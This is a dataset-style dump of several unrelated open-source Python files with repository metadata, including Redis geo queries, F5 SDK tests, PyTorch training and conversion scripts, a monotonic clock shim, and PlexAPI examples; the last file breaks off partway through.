CID = 13 # coefficient of constant current load at rated voltage in range [0,1]
CZD = 14 # coefficient of constant impedance load at rated voltage in range [0,1]
bus_cols = 15
| 38.157303
| 95
| 0.654594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,077
| 0.906066
|
3682efa29fdf319c29d1fc0f9982530abedd7083
| 2,586
|
py
|
Python
|
example.py
|
vinhntb/geo_redis
|
2b79ab844bdf1a56e442393911437c76449bedb0
|
[
"MIT"
] | null | null | null |
example.py
|
vinhntb/geo_redis
|
2b79ab844bdf1a56e442393911437c76449bedb0
|
[
"MIT"
] | null | null | null |
example.py
|
vinhntb/geo_redis
|
2b79ab844bdf1a56e442393911437c76449bedb0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# !/usr/bin/python
#
# example.py
#
#
# Created by vinhntb on 6/27/17.
# Copyright (c) 2017 geo_redis. All rights reserved.
import sys
from bunch import Bunch
from constants import GEO_USER_VISITED
from geo_redis.geo_redis import GeoRedis
def add_user_visited():
user_1 = Bunch(longitude=13.583333, latitude=37.316667, member='101') # The member is user_id
user_2 = Bunch(longitude=13.361389, latitude=38.115556, member='102') # The member is user_id
user_3 = Bunch(longitude=13.583433, latitude=37.317667, member='103') # The member is user_id
user_4 = Bunch(longitude=13.583533, latitude=37.318667, member='104') # The member is user_id
user_5 = Bunch(longitude=13.583633, latitude=37.318767, member='105') # The member is user_id
user_6 = Bunch(longitude=13.583733, latitude=37.318867, member='106') # The member is user_id
user_7 = Bunch(longitude=13.361389, latitude=38.115556, member='107') # The member is user_id
user_8 = Bunch(longitude=15.087269, latitude=37.502669, member='108') # The member is user_id
redis_instance = GeoRedis()
redis_instance.geo_add(GEO_USER_VISITED, **user_1)
redis_instance.geo_add(GEO_USER_VISITED, **user_2)
redis_instance.geo_add(GEO_USER_VISITED, **user_3)
redis_instance.geo_add(GEO_USER_VISITED, **user_4)
redis_instance.geo_add(GEO_USER_VISITED, **user_5)
redis_instance.geo_add(GEO_USER_VISITED, **user_6)
redis_instance.geo_add(GEO_USER_VISITED, **user_7)
redis_instance.geo_add(GEO_USER_VISITED, **user_8)
def get_geo_radius():
redis_instance = GeoRedis()
unit = 'm'
results = redis_instance.geo_radius(name=GEO_USER_VISITED, longitude=13.58, latitude=37.316, radius=500, unit=unit,
withcoord=True, withdist=True)
"""The results are in nested array depend of parameters input. At this example, we have parameters:
withcoord, withdist, withash. So result
1) member (user_id) [0]
2) distance [1]
3) 1) longitude [2][0]
2) latitude [2][1]
"""
print "The results: \n"
print "Total: %s" % len(results)
for member in results:
print '--------------------------------------\n'
print "member: %s \n" % member[0]
print "distance: %s%s \n" % (member[1], unit)
print "longitude: %s \n" % member[2][0]
print "latitude: %s \n" % member[2][0]
def main(argv):
add_user_visited()
get_geo_radius()
if __name__ == '__main__':
main(sys.argv)
| 35.424658
| 119
| 0.655066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 824
| 0.318639
|
36838e2dabeef85a22ebde7d229426841026be1e
| 2,584
|
py
|
Python
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py
|
nghia-tran/f5-common-python
|
acb23a6e5830a119b460c19a578654113419f5c3
|
[
"Apache-2.0"
] | 272
|
2016-02-23T06:05:44.000Z
|
2022-02-20T02:09:32.000Z
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py
|
nghia-tran/f5-common-python
|
acb23a6e5830a119b460c19a578654113419f5c3
|
[
"Apache-2.0"
] | 1,103
|
2016-02-11T17:48:03.000Z
|
2022-02-15T17:13:37.000Z
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py
|
nghia-tran/f5-common-python
|
acb23a6e5830a119b460c19a578654113419f5c3
|
[
"Apache-2.0"
] | 167
|
2016-02-11T17:48:21.000Z
|
2022-01-17T20:13:05.000Z
|
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from f5.bigip.tm.asm.policies.signatures import Signature
from f5.sdk_exception import UnsupportedOperation
from requests.exceptions import HTTPError
class TestSignature(object):
def test_create_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.signatures_s.signature.create()
def test_delete_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.signatures_s.signature.delete()
def test_refresh(self, policy):
coll = policy.signatures_s.get_collection()
hashid = str(coll[1].id)
ws1 = policy.signatures_s.signature.load(id=hashid)
ws2 = policy.signatures_s.signature.load(id=hashid)
assert ws1.kind == ws2.kind
assert ws1.performStaging == ws2.performStaging
ws2.modify(performStaging=False)
assert ws1.performStaging is True
assert ws2.performStaging is False
ws1.refresh()
assert ws1.performStaging is False
def test_load_no_object(self, policy):
with pytest.raises(HTTPError) as err:
policy.signatures_s.signature.load(id='Lx3553-321')
assert err.value.response.status_code == 404
def test_load(self, policy):
coll = policy.signatures_s.get_collection()
hashid = str(coll[1].id)
ws1 = policy.signatures_s.signature.load(id=hashid)
assert ws1.kind == 'tm:asm:policies:signatures:signaturestate'
assert ws1.performStaging is True
ws1.modify(performStaging=False)
assert ws1.performStaging is False
ws2 = policy.signatures_s.signature.load(id=ws1.id)
assert ws1.selfLink == ws2.selfLink
assert ws1.kind == ws2.kind
assert ws1.performStaging == ws2.performStaging
def test_signatures_subcollection(self, policy):
coll = policy.signatures_s.get_collection()
assert isinstance(coll, list)
assert len(coll)
assert isinstance(coll[0], Signature)
| 38
| 74
| 0.705882
| 1,834
| 0.709752
| 0
| 0
| 0
| 0
| 0
| 0
| 622
| 0.240712
|
3686fecb8e7eab5dbc7a6f5508649140b2813832
| 9,711
|
py
|
Python
|
functions.py
|
anoopjakob/flowers_classifier
|
554a7a408dbc4b40cee8098bada548bcea25d80f
|
[
"MIT"
] | null | null | null |
functions.py
|
anoopjakob/flowers_classifier
|
554a7a408dbc4b40cee8098bada548bcea25d80f
|
[
"MIT"
] | null | null | null |
functions.py
|
anoopjakob/flowers_classifier
|
554a7a408dbc4b40cee8098bada548bcea25d80f
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from PIL import Image
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
# changing the already created codes in jupyter notebbooks to a functions
def load_data(data_dir):
train_transforms = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
# both validaton and testing uses same set
test_transforms = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(data_dir + '/train', transform=train_transforms)
test_data = datasets.ImageFolder(data_dir + '/test', transform=test_transforms)
valid_data = datasets.ImageFolder(data_dir + '/valid', transform=test_transforms)
# for trainloader only shuffle is set to true.. so that model trains best
trainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)
testloader = torch.utils.data.DataLoader(test_data, batch_size=32)
validloader = torch.utils.data.DataLoader(valid_data, batch_size=32)
return trainloader, testloader, validloader, train_data, test_data, valid_data
# loading and processing image to use in the final stage of prediction
# this function gets a image path and converts it into tensor and then to numpy array of optimum requirements
def process_image(image):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
'''
# DONE: Process a PIL image for use in a PyTorch model
# Converting image to PIL image
pil_im = Image.open(f'{image}' + '.jpg')
# transforming
transform = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
pil_tfd = transform(pil_im)
# Converting to Numpy array
array_im_tfd = np.array(pil_tfd)
#return array_im_tfd
# Converting to torch tensor from Numpy array
img_tensor = torch.from_numpy(array_im_tfd).type(torch.FloatTensor)
# Adding dimension
img_add_dim = img_tensor.unsqueeze_(0)
return img_add_dim
# converting the new classifer code in jupyter notebook to function
def build_classifier(model, input_units, hidden_units, dropout):
# Weights of pretrained models are frozen
for param in model.parameters():
param.requires_grad = False
# but here since we are defining new classifier below.. new classifiers weights are not frozen
# we only want the weights of model features to be frozen
from collections import OrderedDict
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(input_units, hidden_units)),
('relu', nn.ReLU()),
('dropout1', nn.Dropout(dropout)),
('fc2', nn.Linear(hidden_units, 102)),
('output', nn.LogSoftmax(dim=1))
]))
# replacing the original classifier with our one
model.classifier = classifier
return model
def validation(model, validloader, criterion, gpu_mode):
valid_loss = 0
accuracy = 0
# checking wheter
if gpu_mode == True:
model.to('cuda')
else:
pass
# here data from valid loader used for validation
for ii, (images, labels) in enumerate(validloader):
# checking wheter
if gpu_mode == True:
# change model to work with cuda
if torch.cuda.is_available():
images, labels = images.to('cuda'), labels.to('cuda')
else:
pass
# Forward pass
output = model.forward(images)
# Calculate loss
valid_loss += criterion(output, labels).item()
# Calculate probability
ps = torch.exp(output)
# Calculate accuracy
equality = (labels.data == ps.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
return valid_loss, accuracy
def train_model(model, epochs,trainloader, validloader, criterion, optimizer, gpu_mode):
#epochs = 4
iterations = 0
print_every = 4
if gpu_mode == True:
# change to cuda
model.to('cuda')
else:
pass
for e in range(epochs):
running_loss = 0
# training step getting values for iteration from train loader
for ii, (inputs, labels) in enumerate(trainloader):
iterations += 1
print('Iteration no:',ii+1)
if gpu_mode == True:
inputs, labels = inputs.to('cuda'), labels.to('cuda')
else:
pass
# zeroing parameter gradients .. very important
optimizer.zero_grad()
# Forward pass
outputs = model.forward(inputs)
# calculating the models variation from actual value in the form of loss
loss = criterion(outputs, labels)
# backward pass
loss.backward()
# updating the weights
optimizer.step()
# adding all the loss to calculate the training loss
running_loss += loss.item()
# Carrying out validation step
if iterations % print_every == 0:
# evaluation mode
model.eval()
# here only validation is done . so no calculation of gradients needed
with torch.no_grad():
#using validation function already defined in this file
valid_loss, accuracy = validation(model, validloader, criterion, gpu_mode)
print(f"No. epochs: {e+1}, \
Training Loss: {round(running_loss/print_every,3)} \
Valid Loss: {round(valid_loss/len(validloader),3)} \
Valid Accuracy: {round(float(accuracy/len(validloader)),3)}")
running_loss = 0
# Turning training back on
model.train()
return model, optimizer
def test_model(model, testloader, gpu_mode):
correct = 0
total = 0
if gpu_mode == True:
model.to('cuda')
else:
pass
with torch.no_grad():
# loading iterables from the test loader
for ii, (images, labels) in enumerate(testloader):
if gpu_mode == True:
images, labels = images.to('cuda'), labels.to('cuda')
else:
pass
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print(f"Test accuracy of model for {total} images: {round(100 * correct / total,3)}%")
def save_model(model, train_data, optimizer, save_dir, epochs):
checkpoint = {'state_dict': model.state_dict(),
'classifier': model.classifier,
'class_to_idx': train_data.class_to_idx,
'opt_state': optimizer.state_dict,
'num_epochs': epochs}
return torch.save(checkpoint, save_dir)
def load_checkpoint(model, save_dir, gpu_mode):
if gpu_mode == True:
checkpoint = torch.load(save_dir)
else:
checkpoint = torch.load(save_dir, map_location=lambda storage, loc: storage)
model.classifier = checkpoint['classifier']
model.load_state_dict(checkpoint['state_dict'])
model.class_to_idx = checkpoint['class_to_idx']
return model
def predict(processed_image, loaded_model, topk, gpu_mode):
# evaluation mode
loaded_model.eval()
if gpu_mode == True:
loaded_model.to('cuda')
else:
loaded_model.cpu()
# turning gradient off
with torch.no_grad():
# Running image through network
output = loaded_model.forward(processed_image)
# Calculating probabilities
probs = torch.exp(output)
probs_top = probs.topk(topk)[0]
index_top = probs.topk(topk)[1]
# Converting it into np array or lists
probs_top_list = np.array(probs_top)[0].cpu()
index_top_list = np.array(index_top[0]).cpu()
# Loading index and class mapping
class_to_idx = loaded_model.class_to_idx
# Inverting index-class dictionary
indx_to_class = {x: y for y, x in class_to_idx.items()}
classes_top_list = []
for index in index_top_list:
classes_top_list += [indx_to_class[index]]
return probs_top_list, classes_top_list
| 32.69697
| 109
| 0.571105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,493
| 0.256719
|
3689044eb37e849dc16de8bc84d7a338cb4ea424
| 4,232
|
py
|
Python
|
monotonic_cffi.py
|
rkyoto/monotonic_cffi
|
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
|
[
"Apache-2.0"
] | 1
|
2016-05-03T06:51:10.000Z
|
2016-05-03T06:51:10.000Z
|
monotonic_cffi.py
|
rkyoto/monotonic_cffi
|
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
|
[
"Apache-2.0"
] | null | null | null |
monotonic_cffi.py
|
rkyoto/monotonic_cffi
|
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
|
[
"Apache-2.0"
] | null | null | null |
"""
monotonic_cffi:
Just a cffi version of existing monotonic module on PyPI. See:
https://pypi.python.org/pypi/monotonic
Tested with PyPy 2.6.1 and 4.0.0 on Windows, OSX and Ubuntu.
Copyright 2015 Matt Jones <mattjones1811@hotmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import ctypes.util
import os
import platform
import re
import sys
import time
from cffi import FFI
__all__ = ('monotonic',)
def get_os_release():
"""Get the leading numeric component of the OS release."""
return re.match('[\d.]+', platform.release()).group(0)
def compare_versions(v1, v2):
"""Compare two version strings."""
def normalize(v):
return map(int, re.sub(r'(\.0+)*$', '', v).split('.'))
return cmp(normalize(v1), normalize(v2))
try:
monotonic = time.monotonic
except AttributeError:
try:
ffi = FFI()
if sys.platform == 'darwin': # OS X, iOS
# using mach_absolute_time
ffi.cdef('''
uint64_t mach_absolute_time(void);
typedef struct {
uint32_t numer;
uint32_t denom;
} mach_timebase_info_data_t;
int mach_timebase_info(mach_timebase_info_data_t *info);
''')
libc = ffi.dlopen('/usr/lib/libc.dylib')
timebase = ffi.new('mach_timebase_info_data_t *')
libc.mach_timebase_info(timebase)
ticks_per_second = timebase[0].numer / timebase[0].denom * 1.0e9
def monotonic():
"""Monotonic clock, cannot go backward."""
return libc.mach_absolute_time() / ticks_per_second
elif (sys.platform.startswith('win32')
or sys.platform.startswith('cygwin')):
# Windows Vista / Windows Server 2008 or newer.
ffi.cdef('''
uint64_t GetTickCount64(void);
''')
kernel32 = ffi.dlopen('kernel32.dll')
def monotonic():
"""Monotonic clock, cannot go backward."""
return kernel32.GetTickCount64() / 1000.0
else:
# using clock_gettime
ffi.cdef('''
struct timespec {
long tv_sec;
long tv_nsec;
};
int clock_gettime(long clk_id, struct timespec *tp);
''')
try:
so = ffi.dlopen(ctypes.util.find_library('c'))
clock_gettime = so.clock_gettime
except AttributeError:
so = ffi.dlopen(ctypes.util.find_library('rt'))
clock_gettime = so.clock_gettime
tp = ffi.new('struct timespec *')
if sys.platform.startswith('linux'):
if compare_versions(get_os_release(), '2.6.28') > 0:
CLOCK_MONOTONIC = 4 # CLOCK_MONOTONIC_RAW
else:
CLOCK_MONOTONIC = 1
elif sys.platform.startswith('freebsd'):
CLOCK_MONOTONIC = 4
elif sys.platform.startswith('sunos5'):
CLOCK_MONOTONIC = 4
elif 'bsd' in sys.platform:
CLOCK_MONOTONIC = 3
def monotonic():
"""Monotonic clock, cannot go backward."""
if clock_gettime(CLOCK_MONOTONIC, tp):
errno = ffi.errno
raise OSError(errno, os.strerror(errno))
return tp[0].tv_sec + tp[0].tv_nsec / 1.0e9
# Perform a sanity-check.
if monotonic() - monotonic() > 0:
raise ValueError('monotonic() is not monotonic!')
except Exception:
raise RuntimeError('no suitable implementation for this system')
| 31.117647
| 76
| 0.577977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,973
| 0.46621
|
3689c5f926602b9755b6a68b88197732ca844b70
| 1,141
|
py
|
Python
|
renormalizer/mps/tests/test_mpproperty.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 27
|
2019-09-02T08:35:01.000Z
|
2022-02-22T08:18:02.000Z
|
renormalizer/mps/tests/test_mpproperty.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 54
|
2019-08-30T12:18:39.000Z
|
2022-03-20T13:23:07.000Z
|
renormalizer/mps/tests/test_mpproperty.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 6
|
2019-09-10T03:25:28.000Z
|
2021-11-20T18:41:58.000Z
|
# -*- coding: utf-8 -*-
# Author: Jiajun Ren <jiajunren0522@gmail.com>
# Weitang Li <liwt31@163.com>
import pytest
from renormalizer.mps import Mps, Mpo, MpDm, ThermalProp
from renormalizer.mps.backend import np
from renormalizer.tests.parameter import holstein_model
from renormalizer.utils import Quantity
creation_operator = Mpo.onsite(
holstein_model, r"a^\dagger", dof_set={holstein_model.mol_num // 2}
)
def check_property(mp):
electron_occupation = np.zeros((holstein_model.mol_num))
electron_occupation[holstein_model.mol_num // 2] = 1
assert mp.norm == pytest.approx(1)
assert np.allclose(mp.e_occupations, electron_occupation)
assert np.allclose(mp.ph_occupations, 0)
def test_mps():
gs_mps = Mps.ground_state(holstein_model, max_entangled=False)
mps = creation_operator @ gs_mps
check_property(mps)
def test_mpo():
gs_dm = MpDm.max_entangled_gs(holstein_model)
beta = Quantity(10, "K").to_beta()
tp = ThermalProp(gs_dm, exact=True, space="GS")
tp.evolve(None, 500, beta / 1j)
gs_dm = tp.latest_mps
mp = creation_operator @ gs_dm
check_property(mp)
| 28.525
| 71
| 0.725679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 125
| 0.109553
|
368bbba6590cf73d81aef3506e5c56c32a3d71dc
| 4,661
|
py
|
Python
|
pelee/pth2keras.py
|
DragonGongY/mmdet-ui
|
41582b0ee2b3d9c631ee48540ca8a6d87be362e0
|
[
"Apache-2.0"
] | 1
|
2021-12-24T05:28:20.000Z
|
2021-12-24T05:28:20.000Z
|
pelee/pth2keras.py
|
DragonGongY/mmdet-ui
|
41582b0ee2b3d9c631ee48540ca8a6d87be362e0
|
[
"Apache-2.0"
] | null | null | null |
pelee/pth2keras.py
|
DragonGongY/mmdet-ui
|
41582b0ee2b3d9c631ee48540ca8a6d87be362e0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import numpy as np
import torch
from torch.autograd import Variable
from pytorch2keras.converter import pytorch_to_keras
import torchvision
import os.path as osp
import os
os.environ['KERAS_BACKEND'] = 'tensorflow'
from keras import backend as K
K.clear_session()
K.set_image_dim_ordering('tf')
import test
import tensorflow as tf
import torch
from torch import nn
from torchsummary import summary
from torch.autograd import Variable
import tensorflow
from tensorflow.python.keras.backend import get_session
from tensorflow.python.keras.models import load_model
from tensorflow.python.framework import graph_util, graph_io
from keras.utils import plot_model
# K.set_image_data_format('channels_first') 0
import cv2
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
def softmax(x):
exp_x = np.exp(x)
softmax_x = exp_x / np.sum(exp_x)
return softmax_x
def check_error(output, k_model, input_np, epsilon=1e-3):
pytorch_output = output[0].data.cpu().numpy()
# pytorch_output = np.max(pytorch_output)
# print('torch:',pytorch_output)
# print('=====================')
# print('torch:',pytorch_output)
keras_output = k_model.predict(input_np)
keras_output = keras_output[0]
# keras_output = np.max(keras_output)
# print('=====================')
# print('keras pre:',keras_output)
error = np.max(pytorch_output - keras_output)
print('Error:', error)
assert error < epsilon
return error
import numpy as np
def normalization0_1(data):
_range = np.max(data) - np.min(data)
data = (data - np.min(data)) / _range
mean = [0.485, 0.456, 0.406]
std_ad = [0.229, 0.224, 0.225]
return np.divide(np.subtract(data, mean), std_ad)
def h5_to_pb(h5_model, output_dir, model_name, out_prefix="output_", ):
if osp.exists(output_dir) == False:
os.mkdir(output_dir)
out_nodes = ["output_0_1"] ##get from init_graph
# out_nodes.append(out_prefix + str(0))
tf.identity(h5_model.output[0], out_prefix + str(0))
sess = get_session()
init_graph = sess.graph.as_graph_def() ##get out_nodes
main_graph = graph_util.convert_variables_to_constants(sess, init_graph, out_nodes)
graph_io.write_graph(main_graph, output_dir, name=model_name, as_text=False)
if __name__ == '__main__':
##step1: load pytorch model
# model = test.main()
model = torch.load("/home/dp/Desktop/algorithms/Pelee.Pytorch/weights/Pelee_COCO_size304_epoch40.pth")
model = model.cuda() ##cuda
summary(model, (3, 304, 304)) ##summary(model, (channels, pic_h, pic_w))
model.eval()
##step2: pytorch .pth to keras .h5 and test .h5
input_np = np.random.uniform(0, 1, (1, 3, 304, 304))
input_var = Variable(torch.FloatTensor(input_np)).cuda() ##cuda
# input_var = Variable(torch.FloatTensor(input_np))
k_model = pytorch_to_keras(model, input_var, (3, 304, 304,), verbose=True, name_policy='short')
k_model.summary()
k_model.save('my_model.h5')
output = model(input_var)
check_error(output, k_model, input_np) ## check the error between .pth and .h5
##step3: load .h5 and .h5 to .pb
tf.keras.backend.clear_session()
tf.keras.backend.set_learning_phase(0) ##不可少,
my_model = load_model('my_model.h5')
h5_to_pb(my_model, output_dir='./model/', model_name='model.pb')
##step4: load .pb and test .pb
pb_path = './model/model.pb'
with tf.Session() as sess:
tf.global_variables_initializer().run()
graph_def = tf.GraphDef()
with tf.gfile.GFile(pb_path, 'rb') as f:
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name="")
pic_file = './datasets/data'
pic_list = os.listdir(pic_file)
for name in pic_list:
img_path = '{}/{}'.format(pic_file, name)
im = cv2.imread(img_path)
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
img = cv2.resize(im, (304, 304))
img = np.asarray(img, dtype=np.float32)
img = normalization0_1(img)
img_data = np.transpose(img, (2, 0, 1))
img_input = np.asarray(img_data, dtype=np.float32)[np.newaxis, :, :, :]
input = sess.graph.get_tensor_by_name("input_0:0")
output = sess.graph.get_tensor_by_name("output_0_1:0")
pre_label = sess.run([output], feed_dict={input: img_input})
pre_label = pre_label[0][0]
# print(pre_label)
pre_label = np.argmax(softmax(pre_label))
print('------------------------')
print('{} prelabel is {}'.format(pic_name, pre_label))
| 33.292857
| 106
| 0.657584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,066
| 0.228314
|
368cb9e63af4447a8e0ac9131b7ee4fdf5b50b5c
| 1,997
|
py
|
Python
|
marketservice/models.py
|
mrprofessor/farmersmarket
|
6c835ccb458a0533fe79a9a264fe5a084d647db3
|
[
"MIT"
] | null | null | null |
marketservice/models.py
|
mrprofessor/farmersmarket
|
6c835ccb458a0533fe79a9a264fe5a084d647db3
|
[
"MIT"
] | null | null | null |
marketservice/models.py
|
mrprofessor/farmersmarket
|
6c835ccb458a0533fe79a9a264fe5a084d647db3
|
[
"MIT"
] | null | null | null |
from typing import List, Union
import json
class Product:
def __init__(self, name: str, code: str, price: float):
self.name = name
self.code = code
self.price = price
# Breakdown coupon's description into quantifiable attributes
# For example: BOGO on coffee can be translated as an object
# with certain properties should look like
# bogo_obj.target = "CF1"
# bogo_obj.apply_on = "CF1"
# bogo_obj.discount = 100
# bogo_obj.discount_type = "percent"
# bogo_obj.trigger_limit = 1
# bogo_obj.limit = 0 # no limit
# bogo_obj.apply_all = False
class Coupon:
def __init__(
self,
name: str,
description: str,
target: str,
apply_on: str,
discount: float,
discount_type: Union["percent", "fixed"],
trigger_limit: int,
limit: int,
apply_all: bool,
):
self.name = name
self.description = description
self.target = target
self.apply_on = apply_on
self.discount = discount
self.discount_type = discount_type
self.trigger_limit = trigger_limit
self.limit = limit
self.apply_all = apply_all
class BasketItem:
def __init__(
self,
product: Product,
coupon: Coupon = None,
discount: float = 0.00,
should_apply: bool = True,
):
self.product = product
self.coupon = coupon
self.discount = discount
self.should_apply = should_apply
class Basket:
def __init__(self, items: List[BasketItem] = None):
self.basket_items = items
def to_dict(self):
return {
"basket_items": json.loads(
json.dumps(self.basket_items, default=lambda x: x.__dict__)
),
"total": self.total(),
}
def total(self):
total = 0.00
for item in self.basket_items:
total += item.product.price
total -= item.discount
return round(total, 2)
| 25.602564
| 75
| 0.598398
| 1,569
| 0.785679
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.2003
|
368cd8469f10de7f8f6761744b6f6540ed7865bd
| 649
|
py
|
Python
|
sdk/eventhub/azure-eventhubs/azure/eventhub/eventprocessor/utils.py
|
gautam714/azure-sdk-for-python
|
1741c199c42e8c85a2e14bc78195fd992837ef92
|
[
"MIT"
] | null | null | null |
sdk/eventhub/azure-eventhubs/azure/eventhub/eventprocessor/utils.py
|
gautam714/azure-sdk-for-python
|
1741c199c42e8c85a2e14bc78195fd992837ef92
|
[
"MIT"
] | null | null | null |
sdk/eventhub/azure-eventhubs/azure/eventhub/eventprocessor/utils.py
|
gautam714/azure-sdk-for-python
|
1741c199c42e8c85a2e14bc78195fd992837ef92
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# -----------------------------------------------------------------------------------
import asyncio
def get_running_loop():
try:
return asyncio.get_running_loop()
except AttributeError: # 3.5 / 3.6
loop = asyncio._get_running_loop() # pylint: disable=protected-access
if loop is None:
raise RuntimeError('No running event loop')
return loop
| 38.176471
| 94
| 0.49923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.616333
|
368d248443117fe64f685790a5bf178a4f08ad05
| 4,409
|
py
|
Python
|
tools/examples.py
|
Hellowlol/plexapi
|
313fef4de80fec5a187f71b76e53c3333efcb2fd
|
[
"BSD-3-Clause"
] | 4
|
2016-11-18T07:01:03.000Z
|
2018-05-03T07:45:36.000Z
|
tools/examples.py
|
phongsathorn2540/plexapi
|
313fef4de80fec5a187f71b76e53c3333efcb2fd
|
[
"BSD-3-Clause"
] | 1
|
2016-12-06T15:03:09.000Z
|
2016-12-06T15:03:09.000Z
|
tools/examples.py
|
Hellowlol/plexapi
|
313fef4de80fec5a187f71b76e53c3333efcb2fd
|
[
"BSD-3-Clause"
] | 4
|
2018-01-04T20:15:26.000Z
|
2021-01-26T20:32:28.000Z
|
# -*- coding: utf-8 -*-
"""
PlexAPI Examples
As of Plex version 0.9.11 I noticed that you must be logged in
to browse even the plex server locatewd at localhost. You can
run this example suite with the following command:
>> python examples.py -u <USERNAME> -p <PASSWORD> -s <SERVERNAME>
"""
import argparse, sys
from collections import defaultdict
from os.path import dirname, abspath
sys.path.append(dirname(dirname(abspath(__file__))))
from utils import fetch_server, iter_tests, register
@register()
def list_unwatched_movies(plex):
""" Example 1: List all unwatched movies. """
movies = plex.library.section('Movies')
for video in movies.search(unwatched=True, maxresults=10, sort='addedAt:desc'):
print(' %s' % video.title)
@register()
def mark_all_friends_episodes_watched(plex):
""" Example 2: Mark all Friends episodes watched. """
plex.library.section('TV Shows').get('Friends').markWatched()
@register()
def list_connected_clients(plex):
""" Example 3: List clients connected to the server. """
for client in plex.clients():
print(client.title)
@register()
def play_avatar_on_client(plex):
""" Example 4: Play the Movie Avatar on my iPhone.
Note: Client must be on same network as server.
"""
avatar = plex.library.section('Movies').get('Avatar')
client = plex.client('iphone-mike')
client.playMedia(avatar)
@register()
def list_animated_movies(plex):
""" Example 5: List all animated movies from the 90s. """
movies = plex.library.section('Movies')
for video in movies.search(genre='animation', decade=1990):
print(' %s (%s)' % (video.title, video.year))
@register()
def follow_the_talent(plex):
""" Example 6: List all movies directed by the same person as Jurassic Park. """
movies = plex.library.section('Movies')
jurassic_park = movies.get('Jurassic Park')
for movie in movies.search(director=jurassic_park.directors):
print(movie.title)
@register()
def list_files(plex):
""" Example 7: List files for the latest episode of Friends. """
thelastone = plex.library.section('TV Shows').get('Friends').episodes()[-1]
for part in thelastone.iterParts():
print(part.file)
@register()
def get_stream_url(plex):
""" Example 8: Get a URL you can open in VLC, MPV, etc. """
jurassic_park = plex.library.section('Movies').get('Jurassic Park')
print('Try running the following command:')
print('vlc "%s"' % jurassic_park.getStreamURL(videoResolution='800x600'))
@register()
def most_streamed_titles(plex):
""" Example 9: List the most played movies. """
popular = defaultdict(int)
for item in plex.history():
if item.TYPE == 'movie':
popular[item.title] += 1
popular = sorted(popular.items(), key=lambda x:x[1], reverse=True)
for title, count in popular[:5]:
print('%s (%s plays)' % (title, count))
@register()
def most_active_users(plex):
""" Example 10: List the most active users. """
users = defaultdict(int)
for item in plex.history():
print(item.TYPE)
users[item.username] += 1
users = sorted(users.items(), key=lambda x:x[1], reverse=True)
for user, count in users[:5]:
print('%s (%s plays)' % (user, count))
if __name__ == '__main__':
# There are three ways to authenticate:
# 1. If the server is running on localhost, just run without any auth.
# 2. Pass in --username, --password, and --resource.
# 3. Pass in --baseurl, --token
parser = argparse.ArgumentParser(description='Run PlexAPI examples.')
parser.add_argument('-u', '--username', help='Username for your MyPlex account.')
parser.add_argument('-p', '--password', help='Password for your MyPlex account.')
parser.add_argument('-r', '--resource', help='Name of the Plex resource (requires user/pass).')
parser.add_argument('-b', '--baseurl', help='Baseurl needed for auth token authentication')
